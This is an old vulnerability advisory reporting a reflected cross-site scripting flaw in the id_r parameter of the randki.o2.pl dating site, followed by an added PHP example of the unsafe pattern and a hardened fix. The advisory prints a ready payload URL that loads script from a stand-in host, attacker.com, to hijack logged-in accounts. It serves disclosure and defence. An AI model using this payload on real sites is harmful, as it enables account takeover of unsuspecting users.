kaneda@bohater.net

+ Subject:
XSS bug for randki.o2.pl

+ Version:
2007.03.04

+ Discovered by:
Kanedaaa: http://kaneda.bohater.net

+ randki.o2.pl Description:
randki.o2.pl is a dating service, part of o2.pl, the most famous Polish web portal.

+ Description:
XSS IN:
http://randki.o2.pl/profil.php?id_r=946245%22%3E%3Cscript/XSS%20SRC=http://attacker.com/xss.js%3E%3C/SCRIPT%3E

Data sent in the id_r parameter (URL-decoded):
"><script/XSS SRC=http://attacker.com/xss.js></SCRIPT>

This makes it possible to take over a user account on the dating service at http://randki.o2.pl when a logged-in user clicks a specially crafted URL.
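
How a reflection like this arises and how it is closed on the server side, as an added example that is not randki.o2.pl source code and not part of the original advisory. The function names and the HTML template are hypothetical, and it assumes id_r is a numeric profile id that gets echoed into an HTML attribute; only the parameter name and the sent data come from the advisory.

```php
<?php
// Added example: hypothetical handler code, not the site's own.

// Vulnerable pattern: the raw parameter is concatenated into an attribute,
// so a value containing "> closes the attribute and the tag.
function render_profile_link_unsafe(string $idR): string
{
    return '<a href="profil.php?id_r=' . $idR . '">profile</a>';
}

// Input validation: accept only a short run of digits (assumed id format).
function parse_profile_id(string $idR): ?int
{
    if (!preg_match('/\A[0-9]{1,9}\z/', $idR)) {
        return null;
    }
    return (int) $idR;
}

// Output encoding for HTML text and quoted-attribute contexts.
function html_escape(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hardened pattern: validate first, and still encode on output so the
// page stays safe if the validation rule is ever loosened.
function render_profile_link_safe(string $idR): string
{
    $id = parse_profile_id($idR);
    if ($id === null) {
        return '<p>Invalid profile id: ' . html_escape($idR) . '</p>';
    }
    $href = 'profil.php?id_r=' . rawurlencode((string) $id);
    return '<a href="' . html_escape($href) . '">profile</a>';
}

// Constructed input: the id followed by the sent data quoted in the advisory.
$sent = '946245"><script/XSS SRC=http://attacker.com/xss.js></SCRIPT>';

echo render_profile_link_unsafe($sent), "\n"; // markup is broken out of
echo render_profile_link_safe($sent), "\n";   // rejected, echoed as inert text
echo render_profile_link_safe('946245'), "\n"; // normal link
```

Setting the session cookie with the HttpOnly flag additionally keeps an injected script from reading it, which limits the account takeover described above.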



Timeline:
2007.03.04 bug discovered
2007.03.05 "/" bug sent via http://kontakt.o2.pl/

Original Advisory: http://kaneda.bohater.net/security/20070304-xss-randki.o2.pl.php
